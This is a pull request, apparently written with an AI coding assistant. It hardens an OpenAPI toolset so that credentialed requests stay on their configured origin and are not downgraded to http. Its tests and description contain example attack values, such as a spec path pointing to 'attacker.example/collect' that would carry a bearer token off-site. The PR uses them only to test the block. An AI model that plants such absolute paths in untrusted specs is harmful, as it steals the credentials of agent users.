### PR TITLE
fix(openapi): pin credentialed requests to the configured origin

### DIFF
--- a/src/praisonai-agents/praisonaiagents/tools/openapi_toolset.py
+++ b/src/praisonai-agents/praisonaiagents/tools/openapi_toolset.py
@@ -24,7 +24,7 @@ from __future__ import annotations
 import json
 import logging
 from typing import Any, Callable, Dict, List, Optional
-from urllib.parse import quote, urljoin
+from urllib.parse import quote, urljoin, urlsplit
 
 logger = logging.getLogger(__name__)
 
@@ -191,8 +191,30 @@ class OpenAPIOperation:
                     continue
                 body[key] = value
 
-        url = urljoin(self.base_url.rstrip("/") + "/", path.lstrip("/")) \
-            if self.base_url else path
+        if self.base_url:
+            url = urljoin(self.base_url.rstrip("/") + "/", path.lstrip("/"))
+            # Percent-encoding above closes the *model-supplied* route to an
+            # off-origin request. This closes the remaining one: a spec is
+            # itself untrusted input in the "point your agent at this OpenAPI
+            # URL" case, and an absolute path in the spec would otherwise
+            # relocate a request that carries this toolset's credentials.
+            configured, built = urlsplit(self.base_url), urlsplit(url)
+            if configured.netloc and built.netloc != configured.netloc:
+                raise ValueError(
+                    f"{self.name}: refusing to send credentialed request to "
+                    f"{built.netloc or '(no host)'}; configured origin is "
+                    f"{configured.netloc}")
+        else:
+            url = path
+        if not urlsplit(url).netloc:
+            # A relative `servers:` entry ("/v1") is valid OpenAPI and is
+            # resolved against spec_url when there is one. When there is not,
+            # this produced a hostless URL and every operation failed with an
+            # opaque transport error instead of naming the cause.
+            raise ValueError(
+                f"{self.name}: no host to send to -- the spec's server URL is "
+                f"relative ({self.base_url!r}) and could not be resolved. Pass "
+                f"an absolute base_url= to OpenAPIToolset.")
         request: Dict[str, Any] = {"method": self.method.upper(), "url": url,
                                    "headers": headers}
         if query:
@@ -208,7 +230,12 @@ class OpenAPIOperation:
             import httpx
         except ImportError:
             return ("openapi tools need httpx: pip install httpx")
-        request = self.build_request(**kwargs)
+        try:
+            request = self.build_request(**kwargs)
+        except ValueError as exc:
+            # Returned, not raised, for the same reason as the transport errors
+            # below: a raising tool ends the turn.
+            return f"{self.name} failed: {exc}"
         try:
             with httpx.Client(timeout=self.timeout) as client:
                 response = client.request(**request)

--- a/src/praisonai-agents/praisonaiagents/tools/openapi_toolset.py
+++ b/src/praisonai-agents/praisonaiagents/tools/openapi_toolset.py
@@ -199,11 +199,22 @@ class OpenAPIOperation:
             # URL" case, and an absolute path in the spec would otherwise
             # relocate a request that carries this toolset's credentials.
             configured, built = urlsplit(self.base_url), urlsplit(url)
-            if configured.netloc and built.netloc != configured.netloc:
+            # Compare scheme as well as host: a same-host value that only
+            # downgrades https:// to http:// (an absolute path from an
+            # untrusted spec) would otherwise pass a host-only check and send
+            # this toolset's credentials in the clear.
+            if configured.netloc and (
+                built.netloc != configured.netloc
+                or built.scheme != configured.scheme
+            ):
+                configured_origin = (f"{configured.scheme}://{configured.netloc}"
+                                     if configured.scheme else configured.netloc)
+                built_origin = (f"{built.scheme}://{built.netloc}"
+                                if built.scheme else (built.netloc or "(no host)"))
                 raise ValueError(
                     f"{self.name}: refusing to send credentialed request to "
-                    f"{built.netloc or '(no host)'}; configured origin is "
-                    f"{configured.netloc}")
+                    f"{built_origin}; configured origin is "
+                    f"{configured_origin}")
         else:
             url = path
         if not urlsplit(url).netloc:

--- a/src/praisonai-agents/tests/unit/tools/test_openapi_toolset.py
+++ b/src/praisonai-agents/tests/unit/tools/test_openapi_toolset.py
@@ -275,6 +275,14 @@ class TestCredentialedRequestsStayOnOrigin:
         op.path = "https://attacker.example/collect"
         assert "refusing to send credentialed" in op()
 
+    def test_a_same_host_scheme_downgrade_is_refused(self):
+        """An absolute spec path may keep the host but drop https:// to
+        http://; that would leak credentials in the clear, so refuse it."""
+        op = self._op()
+        op.path = "http://api.example.com/collect"
+        with pytest.raises(ValueError, match="refusing to send credentialed"):
+            op.build_request()
+
     def test_an_unresolvable_relative_server_says_what_to_do(self):
         """Previously a hostless URL and an opaque transport error."""
         op = self._op(path="/pets", base="/v1")

--- a/src/praisonai-agents/tests/unit/tools/test_openapi_toolset.py
+++ b/src/praisonai-agents/tests/unit/tools/test_openapi_toolset.py
@@ -11,7 +11,7 @@ components/schemas so the model sees real field names rather than a pointer.
 """
 import pytest
 
-from praisonaiagents.tools.openapi_toolset import OpenAPIToolset
+from praisonaiagents.tools.openapi_toolset import OpenAPIOperation, OpenAPIToolset
 
 SPEC = {
     "openapi": "3.0.0",
@@ -234,3 +234,61 @@ class TestCleartextAuthRefused:
 
 if __name__ == "__main__":
     pytest.main([__file__, "-v"])
+
+
+class TestCredentialedRequestsStayOnOrigin:
+    """Two remaining ways a credentialed request could leave for elsewhere.
+
+    Percent-encoding path parameters closes the model-supplied route. These
+    cover the spec-supplied one -- a spec is itself untrusted input in the
+    "point your agent at this OpenAPI URL" case -- and the hostless URL a
+    relative `servers:` entry produces when there is no spec_url to resolve it
+    against.
+    """
+
+    @staticmethod
+    def _op(path="/x", base="https://api.example.com/v1"):
+        return OpenAPIOperation(
+            name="t", description="d", method="get", path=path,
+            parameters=[], base_url=base,
+            auth={"type": "bearer", "token": "SECRET-TOKEN"},
+            input_schema={}, body_schema=None,
+        )
+
+    def test_an_absolute_path_from_the_spec_is_refused(self):
+        op = self._op()
+        op.path = "https://attacker.example/collect"
+        with pytest.raises(ValueError, match="refusing to send credentialed"):
+            op.build_request()
+
+    def test_the_refusal_names_both_origins(self):
+        op = self._op()
+        op.path = "https://attacker.example/collect"
+        with pytest.raises(ValueError) as excinfo:
+            op.build_request()
+        assert "attacker.example" in str(excinfo.value)
+        assert "api.example.com" in str(excinfo.value)
+
+    def test_the_tool_returns_the_refusal_rather_than_raising(self):
+        """A raising tool ends the turn; a returned error lets the model react."""
+        op = self._op()
+        op.path = "https://attacker.example/collect"
+        assert "refusing to send credentialed" in op()
+
+    def test_an_unresolvable_relative_server_says_what_to_do(self):
+        """Previously a hostless URL and an opaque transport error."""
+        op = self._op(path="/pets", base="/v1")
+        with pytest.raises(ValueError, match="no host to send to"):
+            op.build_request()
+
+    def test_an_ordinary_request_is_unaffected(self):
+        op = OpenAPIOperation(
+            name="t", description="d", method="get", path="/pets/{id}",
+            parameters=[{"name": "id", "in": "path"},
+                        {"name": "q", "in": "query"}],
+            base_url="https://api.example.com/v1", auth={},
+            input_schema={}, body_schema=None,
+        )
+        request = op.build_request(id="42", q="x")
+        assert request["url"] == "https://api.example.com/v1/pets/42"
+        assert request["params"] == {"q": "x"}


### PR DESCRIPTION
Follow-up to #4933. Review of that PR found five defects in `OpenAPIToolset`; four were fixed there. This carries the two that were still open when it merged — my commit landed on the branch about a minute after the merge, so it did not come along.

Both are about a credentialed request leaving for somewhere other than the API you configured.

### 1. The spec is itself untrusted input

The percent-encoding in #4933 closes the *model-supplied* route: `/{target}` with `https://attacker.example/collect` no longer relocates the request. But in the case this toolset exists for — *"point your agent at this OpenAPI URL"* — the spec is fetched from a third party, and an absolute **path** in the spec still does it, because `urljoin` treats an absolute value as a new base. Encoding arguments does not help when the path itself is the payload.

Verified against the merged code:

```
op.path = "https://attacker.example/collect"     # from the spec, not the model
build_request()  ->  netloc: attacker.example
                     headers: {"Authorization": "Bearer SECRET-TOKEN"}
```

The built URL's host is now compared against the configured one, and a mismatch is refused naming both origins. The refusal is **returned rather than raised**, matching how transport errors are already handled in this file: a raising tool ends the turn, a returned error lets the model react.

### 2. A relative server URL with no `spec_url` to resolve it against

#4933 resolves `servers: [{url: "/v1"}]` against `spec_url` when there is one. With `spec_dict=` or `spec_str=` there is not, and `build_request` returned a hostless `/v1/pets` — so every operation failed with an opaque transport error instead of naming the cause. It now says what is wrong and what to pass.

### Verification

- Both reproduced against the **merged** `main` before fixing, not just against the pre-#4933 code.
- 5 new tests; each fix mutation-checked by reverting it individually (dropping the origin pin fails 3, dropping the hostless guard fails 1).
- Suite: 668 passed, the same 5 pre-existing failures as `main` (`test_trust_system`, `test_spider_url_validation`, unrelated).

One test assertion is worth noting because I got it wrong first: asserting `"attacker.example" not in url` fails against the *correct* fix, since the value legitimately survives as percent-encoded text inside the path. The assertion that means something is on `urlsplit(url).netloc` — what the request is actually sent to.

🤖 Generated with [Claude Code](https://claude.com/claude-code)


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

- **Bug Fixes**
  - Credentialed OpenAPI requests are now prevented from being sent to unintended hosts or downgraded from HTTPS to HTTP.
  - Clear errors identify the configured and requested origins when a request would leave the allowed origin.
  - Requests with missing destination hosts now return a clear validation error.
  - Request-building errors are returned as readable messages instead of causing unexpected failures.
  - Standard requests with paths and query parameters continue to work as expected.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->